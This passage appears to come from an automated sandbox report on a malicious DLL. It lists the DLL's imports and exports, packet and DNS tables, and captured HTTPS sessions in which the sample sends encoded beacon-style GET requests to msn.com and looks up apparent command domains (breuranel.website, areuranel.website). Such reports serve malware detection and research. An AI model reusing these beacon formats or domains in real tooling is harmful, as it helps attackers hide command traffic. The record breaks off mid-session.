                                                                                          MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                          Exports

                                                                                          NameOrdinalAddress
                                                                                          BeGrass10x10016020
                                                                                          Fieldeight20x100162f0
                                                                                          Often30x10016510
                                                                                          Townenter40x100167a0

                                                                                          Network Behavior

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 11, 2021 22:50:22.477772951 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.477812052 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.479016066 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.511131048 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.511164904 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.590322971 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.590380907 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.590491056 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.599661112 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.599700928 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.830621004 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.830780029 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.843853951 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.843878031 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.844290972 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.915033102 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.915242910 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:22.968174934 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.075587034 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.075615883 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.075884104 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.171344995 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.709528923 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.755141020 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.823232889 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.825589895 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.830543995 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.839725018 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.839776993 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.839807034 CEST49765443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.839818001 CEST4434976513.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.898751020 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:23.939150095 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:24.014254093 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:24.014353991 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:24.014559031 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:24.430315018 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:24.430345058 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:50:24.430403948 CEST49766443192.168.2.513.82.28.61
                                                                                          Oct 11, 2021 22:50:24.430413008 CEST4434976613.82.28.61192.168.2.5
                                                                                          Oct 11, 2021 22:51:06.365499020 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:06.365540028 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:06.365628958 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:06.366198063 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:06.366214037 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:06.877902031 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:06.890742064 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:06.896148920 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:06.896168947 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:06.896533966 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:06.899832964 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:06.943133116 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.066915035 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.066991091 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.067071915 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:07.067372084 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:07.067388058 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.067486048 CEST49785443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:07.067492962 CEST4434978540.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.096896887 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.096926928 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.097018957 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.097615957 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.097629070 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.169291019 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.169390917 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.171653986 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.171675920 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.172300100 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.174639940 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.195985079 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.196054935 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.196113110 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.197937012 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.197966099 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.197977066 CEST49786443192.168.2.552.98.152.242
                                                                                          Oct 11, 2021 22:51:07.197985888 CEST4434978652.98.152.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.219775915 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.219815969 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.219933033 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.220530987 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.220550060 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.235893965 CEST49788443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:07.235935926 CEST4434978840.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.236211061 CEST49788443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:07.236603975 CEST49788443192.168.2.540.97.161.50
                                                                                          Oct 11, 2021 22:51:07.236620903 CEST4434978840.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.318660975 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.319047928 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.321105003 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.321119070 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.321414948 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.323396921 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.360156059 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.360233068 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.360301018 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.360649109 CEST49787443192.168.2.552.97.137.242
                                                                                          Oct 11, 2021 22:51:07.360671043 CEST4434978752.97.137.242192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.745934010 CEST4434978840.97.161.50192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.746094942 CEST49788443192.168.2.540.97.161.50

                                                                                          UDP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 11, 2021 22:50:22.437870979 CEST5244153192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:50:22.459774971 CEST53524418.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:50:22.550457001 CEST6217653192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:50:22.569350004 CEST53621768.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:50:23.889962912 CEST5959653192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:50:24.435796976 CEST6529653192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:50:46.273989916 CEST6007553192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:50:46.295051098 CEST53600758.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:50:46.829330921 CEST5501653192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:50:46.849863052 CEST53550168.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:06.345551968 CEST5039453192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST53503948.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.075432062 CEST5853053192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST53585308.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.202419996 CEST5381353192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:07.216661930 CEST6373253192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:07.218367100 CEST53538138.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST53637328.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:07.927795887 CEST5734453192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST53573448.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:08.106379986 CEST5445053192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST53544508.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:27.478935003 CEST6051653192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:27.497742891 CEST53605168.8.8.8192.168.2.5
                                                                                          Oct 11, 2021 22:51:28.616483927 CEST5164953192.168.2.58.8.8.8
                                                                                          Oct 11, 2021 22:51:28.635253906 CEST53516498.8.8.8192.168.2.5

                                                                                          DNS Queries

                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                          Oct 11, 2021 22:50:22.437870979 CEST192.168.2.58.8.8.80x9bacStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:22.550457001 CEST192.168.2.58.8.8.80xdafStandard query (0)msn.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:23.889962912 CEST192.168.2.58.8.8.80xdaf9Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:24.435796976 CEST192.168.2.58.8.8.80xfbd4Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:46.273989916 CEST192.168.2.58.8.8.80x61bdStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:46.829330921 CEST192.168.2.58.8.8.80x427aStandard query (0)breuranel.websiteA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.345551968 CEST192.168.2.58.8.8.80xdfb3Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.075432062 CEST192.168.2.58.8.8.80xdf9cStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.202419996 CEST192.168.2.58.8.8.80x348eStandard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.216661930 CEST192.168.2.58.8.8.80x62a1Standard query (0)outlook.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.927795887 CEST192.168.2.58.8.8.80xd20aStandard query (0)www.outlook.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.106379986 CEST192.168.2.58.8.8.80x3597Standard query (0)outlook.office365.comA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:27.478935003 CEST192.168.2.58.8.8.80x5457Standard query (0)areuranel.websiteA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:28.616483927 CEST192.168.2.58.8.8.80xa4f3Standard query (0)areuranel.websiteA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          Oct 11, 2021 22:50:22.459774971 CEST8.8.8.8192.168.2.50x9bacNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:22.569350004 CEST8.8.8.8192.168.2.50xdafNo error (0)msn.com13.82.28.61A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:23.907807112 CEST8.8.8.8192.168.2.50xdaf9No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:24.454166889 CEST8.8.8.8192.168.2.50xfbd4No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:46.295051098 CEST8.8.8.8192.168.2.50x61bdName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:50:46.849863052 CEST8.8.8.8192.168.2.50x427aName error (3)breuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:06.363910913 CEST8.8.8.8192.168.2.50xdfb3No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)HHN-efz.ms-acdc.office.com52.98.152.242A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)HHN-efz.ms-acdc.office.com52.98.207.210A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)HHN-efz.ms-acdc.office.com52.98.208.66A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.095448971 CEST8.8.8.8192.168.2.50xdf9cNo error (0)HHN-efz.ms-acdc.office.com40.101.8.162A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.218367100 CEST8.8.8.8192.168.2.50x348eNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.218367100 CEST8.8.8.8192.168.2.50x348eNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.218367100 CEST8.8.8.8192.168.2.50x348eNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.218367100 CEST8.8.8.8192.168.2.50x348eNo error (0)FRA-efz.ms-acdc.office.com52.97.137.242A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.218367100 CEST8.8.8.8192.168.2.50x348eNo error (0)FRA-efz.ms-acdc.office.com52.98.208.34A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.218367100 CEST8.8.8.8192.168.2.50x348eNo error (0)FRA-efz.ms-acdc.office.com40.101.124.18A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.161.50A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.156.114A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.160.2A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.128.194A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.164.146A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.153.146A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.116.82A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.234621048 CEST8.8.8.8192.168.2.50x62a1No error (0)outlook.com40.97.148.226A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)www.outlook.comoutlook.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)outlook.ms-acdc.office.comFRA-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)FRA-efz.ms-acdc.office.com52.98.208.66A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)FRA-efz.ms-acdc.office.com52.97.157.162A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:07.945739031 CEST8.8.8.8192.168.2.50xd20aNo error (0)FRA-efz.ms-acdc.office.com52.97.212.34A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)outlook.office365.comoutlook.ha.office365.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)outlook.ha.office365.comoutlook.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)outlook.ms-acdc.office.comHHN-efz.ms-acdc.office.comCNAME (Canonical name)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com40.101.9.178A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com52.97.151.66A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com52.97.151.98A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:08.124209881 CEST8.8.8.8192.168.2.50x3597No error (0)HHN-efz.ms-acdc.office.com52.97.147.2A (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:27.497742891 CEST8.8.8.8192.168.2.50x5457Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)
                                                                                          Oct 11, 2021 22:51:28.635253906 CEST8.8.8.8192.168.2.50xa4f3Name error (3)areuranel.websitenonenoneA (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • msn.com
                                                                                          • outlook.com
                                                                                          • www.outlook.com
                                                                                          • outlook.office365.com

                                                                                          HTTPS Proxied Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.54976513.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:50:23 UTC0OUTGET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: msn.com
                                                                                          2021-10-11 20:50:23 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Location: https://www.msn.com/mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          X-Powered-By: ASP.NET
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Date: Mon, 11 Oct 2021 20:50:23 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 374
                                                                                          2021-10-11 20:50:23 UTC0INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 6a 58 54 76 52 55 33 37 58 2f 6b 4b 41 4e 36 32 75 42 64 33 74 44 54 34 55 75 76 58 66 37 2f 74 76 32 70 61 36 35 30 71 5f 32 42 4e 63 34 67 5a 78 5f 2f 32 46 54 58 65 4b 48 33 47 44 79 44 71 75 66 7a 5a 61 6b 66 76 4b 2f 5f 32 42 43 4e 58 61 6c 6c 6f 6f 71 37 2f 56 4f 44 4d 6b 6d 4e 46 2f 48 4c 68 4c 71 38 4d 4f 4b 63 77 69 76 55 4d 4d 78 4d 67
                                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMg


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.54976613.82.28.61443C:\Windows\System32\loaddll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:50:23 UTC1OUTGET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: msn.com
                                                                                          2021-10-11 20:50:24 UTC1INHTTP/1.1 301 Moved Permanently
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Location: https://www.msn.com/mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          X-Powered-By: ASP.NET
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Date: Mon, 11 Oct 2021 20:50:23 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 402
